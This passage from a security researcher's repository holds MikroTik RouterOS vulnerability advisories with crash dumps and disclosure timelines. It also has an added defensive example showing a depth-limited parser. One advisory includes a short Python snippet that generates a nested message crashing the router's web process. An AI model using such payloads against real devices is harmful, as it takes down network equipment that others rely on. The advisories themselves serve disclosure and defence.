├── LICENSE
├── README.md
├── advisory
│   ├── MikroTik
│   │   ├── CVE-2019-13954
│   │   │   └── README.md
│   │   ├── CVE-2019-13955
│   │   │   └── README.md
│   │   ├── CVE-2020-20211
│   │   │   └── README.md
│   │   ├── CVE-2020-20212
│   │   │   └── README.md
│   │   ├── CVE-2020-20213
│   │   │   └── README.md
│   │   ├── CVE-2020-20214
│   │   │   └── README.md
│   │   ├── CVE-2020-20215
│   │   │   └── README.md
│   │   ├── CVE-2020-20216
│   │   │   └── README.md
│   │   ├── CVE-2020-20217
│   │   │   ├── README.md
│   │   │   └── images
│   │   │       └── route_high_cpu_load.png
│   │   ├── CVE-2020-20218
│   │   │   └── README.md
│   │   ├── CVE-2020-20219
│   │   │   └── README.md
│   │   ├── CVE-2020-20220
│   │   │   └── README.md
│   │   ├── CVE-2020-20221
│   │   │   ├── README.md
│   │   │   └── images
│   │   │       └── cerm_high_cpu_load.png
│   │   ├── CVE-2020-20222
│   │   │   └── README.md
│   │   ├── CVE-2020-20225
│   │   │   └── README.md
│   │   ├── CVE-2020-20227
│   │   │   └── README.md
│   │   ├── CVE-2020-20230
│   │   │   ├── README.md
│   │   │   └── images
│   │   │       └── sshd_high_cpu_load.png
│   │   ├── CVE-2020-20231
│   │   │   └── README.md
│   │   ├── CVE-2020-20236
│   │   │   └── README.md
│   │   ├── CVE-2020-20237
│   │   │   └── README.md
│   │   ├── CVE-2020-20245
│   │   │   └── README.md
│   │   ├── CVE-2020-20246
│   │   │   └── README.md
│   │   ├── CVE-2020-20248
│   │   │   ├── README.md
│   │   │   └── images
│   │   │       └── memtest_high_cpu_load.png
│   │   ├── CVE-2020-20249
│   │   │   └── README.md
│   │   ├── CVE-2020-20250
│   │   │   └── README.md
│   │   ├── CVE-2020-20252
│   │   │   └── README.md
│   │   ├── CVE-2020-20253
│   │   │   └── README.md
│   │   ├── CVE-2020-20254
│   │   │   └── README.md
│   │   ├── CVE-2020-20262
│   │   │   └── README.md
│   │   ├── CVE-2020-20264
│   │   │   └── README.md
│   │   ├── CVE-2020-20265
│   │   │   └── README.md
│   │   ├── CVE-2020-20266
│   │   │   └── README.md
│   │   ├── CVE-2020-20267
│   │   │   └── README.md
│   │   ├── CVE-2021-36613
│   │   │   └── README.md
│   │   ├── CVE-2021-36614
│   │   │   └── README.md
│   │   ├── CVE-2022-36522
│   │   │   └── README.md
│   │   ├── CVE-2022-45313
│   │   │   └── README.md
│   │   ├── CVE-2022-45315
│   │   │   └── README.md
│   │   ├── vul_hotspot_2
│   │   │   └── README.md
│   │   ├── vul_smb_1
│   │   │   ├── README.md
│   │   │   └── poc.py
│   │   ├── vul_smb_2
│   │   │   ├── README.md
│   │   │   └── poc.py
│   │   └── vul_smb_3
│   │       ├── README.md
│   │       └── poc.py
│   └── Other
│       └── freebsd_rtsold_out_of_bounds_read
│           ├── README.md
│           └── poc.py
├── scripts
│   └── Synology
│       └── syno_finder
│           ├── README.md
│           ├── images
│           │   └── syno_finder_sample.png
│           ├── syno_finder.lua
│           └── synology_finder.pcap
└── slides
    ├── EU-22-Chen-LCDPwn-Breaking-Enterprise.pdf
    ├── EU-23-Quan-Breaking-Theoretical-Limits.pdf
    ├── HITB2021AMS-A_Journey_into_Synology_NAS.pdf
    ├── POC2019-Bug_Hunting_in_Synology_NAS.pdf
    └── POC2022-MikroTik_RouterOS_Security-The_Forgotten_IPC_Message.pdf

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2020, cq674350529
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its
   contributors may be used to endorse or promote products derived from
   this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Sharing my advisories, PoCs, slides and scripts on IoT / protocol security. You can find me at:

+ Medium: [https://medium.com/@cq674350529](https://medium.com/@cq674350529)
+ Blog: [https://cq674350529.github.io/](https://cq674350529.github.io/)
+ Mail: [cq674350529@163.com](mailto:cq674350529@163.org)
+ Twitter: [@cq674350529](https://twitter.com/cq674350529)

### Slides

+ BHEU2023: [Breaking Theoretical Limits: The Gap Between Virtual NICs and Physical Network Cards](http://i.blackhat.com/EU-23/Presentations/EU-23-Quan-Breaking-Theoretical-Limits_REV2.pdf) *(co-authored)*
+ BHEU2022: [LCDPwn: Breaking Enterprise-Things with Layer 2 Discovery Protocol Vulnerabilities Again](slides/EU-22-Chen-LCDPwn-Breaking-Enterprise.pdf) ([video](https://www.youtube.com/watch?v=qIwKg2qny0c))
  + [(website) LCDPwn](https://cq674350529.github.io/lcdpwn/)
+ POC2022: [MikroTik RouterOS Security: The Forgotten IPC Message](slides/POC2022-MikroTik_RouterOS_Security-The_Forgotten_IPC_Message.pdf) ([video](https://www.youtube.com/watch?v=fkigIlDe6vs))
+ HITB2021AMS: [A Journey into Synology NAS](slides/HITB2021AMS-A_Journey_into_Synology_NAS.pdf) ([video](https://www.youtube.com/watch?v=XGmzeM2IEB4))
  + [(blog) A Journey into Synology NAS, Part 1: Introduction to Synology NAS](https://cq674350529.github.io/2021/08/30/A-Journey-into-Synology-NAS-%E7%B3%BB%E5%88%97%E4%B8%80-%E7%BE%A4%E6%99%96NAS%E4%BB%8B%E7%BB%8D/)
  + [(blog) A Journey into Synology NAS, Part 2: Analysis of the findhostd service](https://cq674350529.github.io/2021/09/12/A-Journey-into-Synology-NAS-%E7%B3%BB%E5%88%97%E4%BA%8C-findhostd%E6%9C%8D%E5%8A%A1%E5%88%86%E6%9E%90/)
  + [(blog) A Journey into Synology NAS, Part 3: Analysis of the iscsi_snapshot_comm_core service](https://cq674350529.github.io/2021/12/25/A-Journey-into-Synology-NAS-%E7%B3%BB%E5%88%97%E4%B8%89-iscsi_snapshot_comm_core%E6%9C%8D%E5%8A%A1%E5%88%86%E6%9E%90/)
  + [(blog) A Journey into Synology NAS, Part 4: HTTP request flow and case studies](https://cq674350529.github.io/2022/01/22/A-Journey-into-Synology-NAS-%E7%B3%BB%E5%88%97%E5%9B%9B-HTTP%E8%AF%B7%E6%B1%82%E6%B5%81%E7%A8%8B%E5%92%8C%E6%A1%88%E4%BE%8B%E5%88%86%E6%9E%90/)
+ POC2019: [Bug Hunting in Synology NAS](slides/POC2019-Bug_Hunting_in_Synology_NAS.pdf)

### Advisory

#### Protocol

+ [FreeBSD rtsold Out of Bounds Read Vulnerability](advisory/Other/freebsd_rtsold_out_of_bounds_read)

### Scripts

+ [syno_finder](scripts/Synology/syno_finder): a Wireshark dissector (Lua plugin) for the Synology finder protocol (9999/udp)

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2019-13954/README.md:
--------------------------------------------------------------------------------
### CVE-2019-13954

#### Description

The `www` process suffers from a memory exhaustion vulnerability. By sending a crafted `POST` request to `/jsproxy/upload`, an authenticated remote user can cause the `www` binary to consume all memory.

When testing the proof of concept on an x86 RouterOS VM, this vulnerability didn't just crash `www` but caused the whole system to reboot.
The PoC is available at [CVE-2019-13954](https://github.com/tenable/routeros/tree/master/poc/cve_2019_13954/src/main.cpp).

#### Affected Version

This vulnerability was initially found in long-term `6.42.11` and has been fixed since stable `6.45.1`.

#### References

+ [Two vulnerabilities found in MikroTik's RouterOS](https://seclists.org/fulldisclosure/2019/Jul/20)
+ [CVE-2019-13954](https://github.com/tenable/routeros/tree/master/poc/cve_2019_13954)
+ [routeros](https://github.com/tenable/routeros)
+ [Analysis of MikroTik RouterOS vulnerability CVE-2019-13954](https://cq674350529.github.io/2019/08/23/MikroTik-RouterOS%E6%BC%8F%E6%B4%9ECVE-2019-13954%E5%88%86%E6%9E%90/)

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2019-13955/README.md:
--------------------------------------------------------------------------------
### CVE-2019-13955

#### Description

The `www` process suffers from a stack exhaustion vulnerability. By sending a crafted packet to the `www` process, an unauthenticated remote user can trigger stack exhaustion via recursive parsing of `JSON` containing message type M.

Based on the [`routeros`](https://github.com/tenable/routeros) repository, the main part of the crafted message can be generated with a short Python snippet.

```python
# Start from a two-level nested message and push one more level of
# nesting into it on every iteration. The original snippet used Python 2's
# xrange; range behaves the same here and also works on Python 3.
msg = "{M01:[M01:[]]}"
for _ in range(2000):
    msg = msg.replace('[]', "[M01:[]]")
```

Against long-term `6.43.16`, the PoC resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.
Reading /nova/lib/www/jsproxy.p from remote target...
Reading /lib/libucrypto.so from remote target...
[New Thread 279.366]

Thread 2 "www" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 279.366]
=> 0x7746792f: call 0x774661a9
   0x77467934: add ebx,0x5028
   0x7746793a: mov DWORD PTR [ebp-0x3c],eax
   0x7746793d: mov DWORD PTR [ebp-0x44],edx
0x7746792f in ?? () from target:/nova/lib/www/jsproxy.p
(gdb) info inferiors
  Num  Description       Executable
* 1    process 279       target:/nova/bin/www
(gdb) bt
#0  0x7746792f in ?? () from target:/nova/lib/www/jsproxy.p
#1  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#2  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#3  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#4  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#5  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#6  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#7  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#8  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#9  0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#10 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#11 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#12 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#13 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#14 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#15 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#16 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#17 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#18 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#19 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#20 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#21 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#22 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#23 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
#24 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p
...
```

The PoC is available at [CVE-2019-13955](https://github.com/tenable/routeros/blob/master/poc/cve_2019_13955/src/main.cpp).

#### Affected Version

This vulnerability was initially found in long-term `6.42.11` and has been fixed since stable `6.45.1`.

#### References

+ [Two vulnerabilities found in MikroTik's RouterOS](https://seclists.org/fulldisclosure/2019/Jul/20)
+ [CVE-2019-13955](https://github.com/tenable/routeros/tree/master/poc/cve_2019_13955)
+ [routeros](https://github.com/tenable/routeros)
+ [Analysis of MikroTik RouterOS CVE-2018-1158: discovering CVE-2019-13955](https://cq674350529.github.io/2019/08/15/CVE-2018-1158-MikroTik-RouterOS%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8B%E5%8F%91%E7%8E%B0CVE-2019-13955/)

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20211/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20211

#### Description

The `console` process suffers from an assertion failure vulnerability: there is a reachable assertion in the `console` process. By sending a crafted packet, an authenticated remote user can crash the `console` process through that assertion failure.

Against stable `6.46.3`, the PoC resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGABRT, Aborted.
=> 0x7775255b : pop ebx
   0x7775255c : cmp eax,0xfffff000
   0x77752561 : jbe 0x77752571
   0x77752563 : mov edx,DWORD PTR [ebx-0x34]
0x7775255b in raise () from target:/lib/libc.so.0
(gdb) i r
eax            0x0                 0
ecx            0x105               261
edx            0x6                 6
ebx            0x105               261
esp            0x7fe69288          0x7fe69288
ebp            0x7fe69290          0x7fe69290
esi            0x7775a200          2004197888
edi            0x0                 0
eip            0x7775255b          0x7775255b
eflags         0x246               [ PF ZF IF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 261       target:/nova/bin/console
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.05.16-21:19:30.73@0:
2020.05.16-21:19:30.73@0:
2020.05.16-21:19:30.74@0: /nova/bin/console
2020.05.16-21:19:30.74@0: --- signal=6 --------------------------------------------
2020.05.16-21:19:30.74@0:
2020.05.16-21:19:30.74@0: eip=0x7775255b eflags=0x00000246
2020.05.16-21:19:30.74@0: edi=0x00000000 esi=0x7775a200 ebp=0x7fe69290 esp=0x7fe69288
2020.05.16-21:19:30.74@0: eax=0x00000000 ebx=0x00000105 ecx=0x00000105 edx=0x00000006
2020.05.16-21:19:30.74@0:
2020.05.16-21:19:30.74@0: maps:
2020.05.16-21:19:30.74@0: 08048000-080bd000 r-xp 00000000 00:0c 1036 /nova/bin/console
2020.05.16-21:19:30.74@0: 77724000-77759000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.05.16-21:19:30.74@0: 7775d000-77777000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.05.16-21:19:30.74@0: 77778000-77787000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.05.16-21:19:30.74@0: 77788000-7778e000 r-xp 00000000 00:0c 949 /lib/libufiber.so
2020.05.16-21:19:30.74@0: 7778f000-777db000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.05.16-21:19:30.74@0: 777e1000-777e8000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.05.16-21:19:30.74@0:
2020.05.16-21:19:30.74@0: stack: 0x7fe6a000 - 0x7fe69288
2020.05.16-21:19:30.74@0: 00 a0 75 77 00 a0 75 77 c8 92 e6 7f 77 e0 74 77 06 00 00 00 00 a2 75 77 20 00 00 00 00 00 00 00
2020.05.16-21:19:30.74@0: 0c 93 e6 7f 28 93 e6 7f c4 92 e6 7f e4 ba 7d 77 01 00 00 00 e4 ba 7d 77 0c 93 e6 7f 00 00 00 00
2020.05.16-21:19:30.74@0:
2020.05.16-21:19:30.74@0: code: 0x7775255b
2020.05.16-21:19:30.74@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8
2020.05.16-21:19:30.74@0:
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.5`. It seems that the latest stable version, `6.46.5`, still suffers from this vulnerability.

#### Timeline

+ 2019/08/23 - reported the vulnerability to the vendor
+ 2019/08/30 - vendor confirmed the vulnerability and will fix it as soon as possible
+ 2020/04/14 - still no fix
+ 2021/05/04 - CVE assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20212/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20212

#### Description

The `console` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `console` process through a NULL pointer dereference.

Against stable `6.46.3`, the PoC resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x776d8cd9 <_ZN6stringC2ERKS_+21>: mov eax,DWORD PTR [eax]
   0x776d8cdb <_ZN6stringC2ERKS_+23>: mov edx,DWORD PTR [eax]
   0x776d8cdd <_ZN6stringC2ERKS_+25>: add edx,eax
   0x776d8cdf <_ZN6stringC2ERKS_+27>: add edx,0x4
0x776d8cd9 in string::string(string const&) () from target:/lib/libuc++.so
(gdb) i r
eax            0x0                 0
ecx            0x0                 0
edx            0x80c2ef0           135016176
ebx            0x776e14ec          2003703020
esp            0x7f8e59ec          0x7f8e59ec
ebp            0x7f8e59f8          0x7f8e59f8
esi            0x80d87a4           135104420
edi            0x7f8e5a58          2140035672
eip            0x776d8cd9          0x776d8cd9
eflags         0x10202             [ IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 180       target:/nova/bin/console
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.05.16-20:52:17.11@0:
2020.05.16-20:52:17.11@0:
2020.05.16-20:52:17.11@0: /nova/bin/console
2020.05.16-20:52:17.11@0: --- signal=11 --------------------------------------------
2020.05.16-20:52:17.11@0:
2020.05.16-20:52:17.11@0: eip=0x776d8cd9 eflags=0x00010202
2020.05.16-20:52:17.11@0: edi=0x7f8e5a58 esi=0x080d87a4 ebp=0x7f8e59f8 esp=0x7f8e59ec
2020.05.16-20:52:17.11@0: eax=0x00000000 ebx=0x776e14ec ecx=0x00000000 edx=0x080c2ef0
2020.05.16-20:52:17.11@0:
2020.05.16-20:52:17.11@0: maps:
2020.05.16-20:52:17.11@0: 08048000-080bd000 r-xp 00000000 00:0c 1036 /nova/bin/console
2020.05.16-20:52:17.11@0: 7767e000-776b3000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.05.16-20:52:17.11@0: 776b7000-776d1000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.05.16-20:52:17.11@0: 776d2000-776e1000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.05.16-20:52:17.11@0: 776e2000-776e8000 r-xp 00000000 00:0c 949 /lib/libufiber.so
2020.05.16-20:52:17.11@0: 776e9000-77735000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.05.16-20:52:17.11@0: 7773b000-77742000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.05.16-20:52:17.11@0:
2020.05.16-20:52:17.11@0: stack: 0x7f8e6000 - 0x7f8e59ec
2020.05.16-20:52:17.11@0: c4 41 0c 08 01 00 00 00 c4 41 0c 08 28 5a 8e 7f f2 74 05 08 50 5a 8e 7f 00 00 00 00 01 00 00 00
2020.05.16-20:52:17.11@0: 04 00 00 00 c4 41 0c 08 02 00 ff 88 58 5a 8e 7f 50 5a 8e 7f a4 87 0d 08 58 5a 8e 7f 78 5a 8e 7f
2020.05.16-20:52:17.11@0:
2020.05.16-20:52:17.11@0: code: 0x776d8cd9
2020.05.16-20:52:17.11@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.5`. It seems that the latest stable version, `6.46.5`, still suffers from this vulnerability.

#### Timeline

+ 2019/08/26 - reported the vulnerability to the vendor
+ 2019/08/28 - vendor confirmed the vulnerability and will fix it as soon as possible
+ 2020/04/14 - still no fix
+ 2021/05/04 - CVE assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20213/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20213

#### Description

The `net` process suffers from a stack exhaustion vulnerability. By sending a crafted packet to the `net` process, an authenticated remote user can trigger stack exhaustion via recursive function calls.

When testing the proof of concept on an x86 RouterOS VM, this vulnerability didn't just crash the `net` process but caused the whole system to reboot.

Against stable `6.46.5`, the PoC resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x809ec65: push eax
   0x809ec66: push esi
   0x809ec67: push DWORD PTR [ebp+0xc]
   0x809ec6a: push edi
0x0809ec65 in ?? ()
(gdb) i r
eax            0xfe0008            16646152
ecx            0x7772cae4          2004011748
edx            0x8122630           135407152
ebx            0x7772cae4          2004011748
esp            0x7f310fe0          0x7f310fe0
ebp            0x7f311018          0x7f311018
esi            0x7fb0ff48          2142306120
edi            0x7fb0fe4c          2142305868
eip            0x809ec65           0x809ec65
eflags         0x10206             [ PF IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 106       target:/nova/bin/net
(gdb) info proc mappings
process 106
Mapped address spaces:

        Start Addr   End Addr       Size     Offset objfile
         0x8048000  0x8121000    0xd9000        0x0 /nova/bin/net
         0x8121000  0x8123000     0x2000    0xd8000 /nova/bin/net
         0x8123000  0x8152000    0x2f000        0x0 [heap]
        0x77634000 0x77644000    0x10000        0x0 socket:[825]
        0x77644000 0x77654000    0x10000        0x0 socket:[824]
        0x77654000 0x77689000    0x35000        0x0 /lib/libuClibc-0.9.33.2.so
        0x77689000 0x7768a000     0x1000    0x35000 /lib/libuClibc-0.9.33.2.so
        0x7768a000 0x7768b000     0x1000    0x36000 /lib/libuClibc-0.9.33.2.so
        0x7768b000 0x7768d000     0x2000        0x0
        0x7768d000 0x776a7000    0x1a000        0x0 /lib/libgcc_s.so.1
        0x776a7000 0x776a8000     0x1000    0x19000 /lib/libgcc_s.so.1
        0x776a8000 0x776b7000     0xf000        0x0 /lib/libuc++.so
        0x776b7000 0x776b8000     0x1000     0xf000 /lib/libuc++.so
        0x776b8000 0x776c6000     0xe000        0x0 /lib/libz.so
        0x776c6000 0x776c7000     0x1000     0xe000 /lib/libz.so
        0x776c7000 0x776d1000     0xa000        0x0 /lib/libm-0.9.33.2.so
        0x776d1000 0x776d2000     0x1000     0xa000 /lib/libm-0.9.33.2.so
        0x776d2000 0x776d3000     0x1000     0xb000 /lib/libm-0.9.33.2.so
        0x776d3000 0x776db000     0x8000        0x0 /lib/libubox.so
        0x776db000 0x776dc000     0x1000     0x7000 /lib/libubox.so
        0x776dc000 0x776df000     0x3000        0x0 /lib/libuxml++.so
        0x776df000 0x776e0000     0x1000     0x2000 /lib/libuxml++.so
        0x776e0000 0x7772c000    0x4c000        0x0 /lib/libumsg.so
        0x7772c000 0x7772e000     0x2000    0x4c000 /lib/libumsg.so
        0x7772e000 0x7772f000     0x1000        0x0
        0x7772f000 0x7774c000    0x1d000        0x0 /lib/libucrypto.so
        0x7774c000 0x7774d000     0x1000    0x1d000 /lib/libucrypto.so
        0x7774e000 0x77750000     0x2000        0x0
        0x77750000 0x77757000     0x7000        0x0 /lib/ld-uClibc-0.9.33.2.so
        0x77757000 0x77758000     0x1000     0x6000 /lib/ld-uClibc-0.9.33.2.so
        0x77758000 0x77759000     0x1000     0x7000 /lib/ld-uClibc-0.9.33.2.so
        0x7f312000 0x7fb11000   0x7ff000        0x0 [stack]
        0xffffe000 0xfffff000     0x1000        0x0 [vdso]
(gdb) x/10wx $esp
0x7f310fe0: Cannot access memory at address 0x7f310fe0
(gdb) bt
#0  0x0809ec65 in ?? ()
#1  0x0809ec70 in ?? ()
#2  0x0809ec70 in ?? ()
#3  0x0809ec70 in ?? ()
#4  0x0809ec70 in ?? ()
#5  0x0809ec70 in ?? ()
#6  0x0809ec70 in ?? ()
#7  0x0809ec70 in ?? ()
#8  0x0809ec70 in ?? ()
#9  0x0809ec70 in ?? ()
#10 0x0809ec70 in ?? ()
#11 0x0809ec70 in ?? ()
#12 0x0809ec70 in ?? ()
#13 0x0809ec70 in ?? ()
#14 0x0809ec70 in ?? ()
#15 0x0809ec70 in ?? ()
#16 0x0809ec70 in ?? ()
#17 0x0809ec70 in ?? ()
#18 0x0809ec70 in ?? ()
#19 0x0809ec70 in ?? ()
#20 0x0809ec70 in ?? ()
#21 0x0809ec70 in ?? ()
#22 0x0809ec70 in ?? ()
#23 0x0809ec70 in ?? ()
# ...
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.08-11:19:45.40@0:
2020.06.08-11:19:45.40@0:
2020.06.08-11:19:45.40@0: /nova/bin/net
2020.06.08-11:19:45.40@0: --- signal=11 --------------------------------------------
2020.06.08-11:19:45.40@0:
2020.06.08-11:19:45.40@0: eip=0x0809ec65 eflags=0x00010206
2020.06.08-11:19:45.40@0: edi=0x7fb0fe4c esi=0x7fb0ff48 ebp=0x7f311018 esp=0x7f310fe0
2020.06.08-11:19:45.40@0: eax=0x00fe0008 ebx=0x7772cae4 ecx=0x7772cae4 edx=0x08122630
2020.06.08-11:19:45.40@0:
2020.06.08-11:19:45.40@0: maps:
2020.06.08-11:19:45.40@0: 08048000-08121000 r-xp 00000000 00:0c 1004 /nova/bin/net
2020.06.08-11:19:45.40@0: 77654000-77689000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.08-11:19:45.40@0: 7768d000-776a7000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.08-11:19:45.40@0: 776a8000-776b7000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.08-11:19:45.40@0: 776b8000-776c6000 r-xp 00000000 00:0c 945 /lib/libz.so
2020.06.08-11:19:45.40@0: 776c7000-776d1000 r-xp 00000000 00:0c 961 /lib/libm-0.9.33.2.so
2020.06.08-11:19:45.40@0: 776d3000-776db000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.08-11:19:45.40@0: 776dc000-776df000 r-xp 00000000 00:0c 948 /lib/libuxml++.so
2020.06.08-11:19:45.40@0: 776e0000-7772c000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.08-11:19:45.40@0: 7772f000-7774c000 r-xp 00000000 00:0c 947 /lib/libucrypto.so
2020.06.08-11:19:45.40@0: 77750000-77757000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.08-11:19:45.40@0:
2020.06.08-11:19:45.40@0: stack: 0x7fb10000 - 0x7f310fe0
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.5` and was fixed in stable `6.47`.
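CVE-2019-13955 and this advisory share one root cause: the nesting depth of the input sets the recursion depth of the parser, so the sender decides how much stack gets used. The `net` crash above shows the end state: `esp` (`0x7f310fe0`) sits just below the mapped `[stack]` region (`0x7f312000`-`0x7fb11000`), and every frame in the backtrace returns to the same address. The Python below is an added example written for this page, not code from this repository, from Tenable's `routeros` PoCs, or from RouterOS. It parses a hypothetical `{KEY:[KEY:[...]]}` grammar that stands in for the real message format (which is not shown here), once with an unbounded recursive-descent parser and once with the same parser given a nesting limit, and builds its sample input the way the CVE-2019-13955 snippet does. `MAX_DEPTH`, `tokenize`, `parse_unbounded`, `parse_bounded` and `outcome` are names chosen for this example.

```python
"""Bounding recursion depth in a parser of nested messages (added example).

The grammar below is a hypothetical stand-in for the nested message shape
`{KEY:[KEY:[...]]}` shown in the CVE-2019-13955 advisory; it is NOT
RouterOS's real message format or parser.
"""
import re

# Assumed nesting limit. A real service sizes this to the deepest message it
# legitimately needs, which is far below what its thread stack can hold.
MAX_DEPTH = 64

# Tokens of the hypothetical grammar: braces, brackets, ':' and bare keys.
TOKEN_RE = re.compile(r"[{}\[\]:]|[A-Za-z0-9]+")
DELIMITERS = ("{", "}", "[", "]", ":")


class DepthExceeded(ValueError):
    """Raised by the hardened parser before recursion can exhaust the stack."""


def build_nested_message(levels):
    """Constructed sample input, built the same way as the advisory's snippet."""
    msg = "{M01:[M01:[]]}"
    for _ in range(levels):
        msg = msg.replace("[]", "[M01:[]]")
    return msg


def tokenize(text):
    tokens = TOKEN_RE.findall(text)
    if "".join(tokens) != text:
        raise ValueError("message contains unexpected characters")
    return tokens


def _parse_container(tokens, pos, depth, max_depth):
    """Parse one `{...}` or `[...]` at tokens[pos]; return (node, next_pos).

    Every nested container costs one stack frame. With max_depth=None the
    depth is whatever the sender chose (the vulnerable shape); otherwise the
    parser refuses to descend past the limit.
    """
    if max_depth is not None and depth > max_depth:
        raise DepthExceeded(f"nesting depth {depth} exceeds limit {max_depth}")
    if pos >= len(tokens):
        raise ValueError("unexpected end of message")
    opener = tokens[pos]
    if opener not in ("{", "["):
        raise ValueError(f"expected a container at token {pos}, got {opener!r}")
    closer = "}" if opener == "{" else "]"
    node = {} if opener == "{" else []
    pos += 1
    if pos < len(tokens) and tokens[pos] != closer:
        key = tokens[pos]
        if key in DELIMITERS or pos + 1 >= len(tokens) or tokens[pos + 1] != ":":
            raise ValueError(f"expected KEY ':' at token {pos}")
        # The recursive call: the only place depth grows.
        child, pos = _parse_container(tokens, pos + 2, depth + 1, max_depth)
        if opener == "{":
            node[key] = child
        else:
            node.append((key, child))
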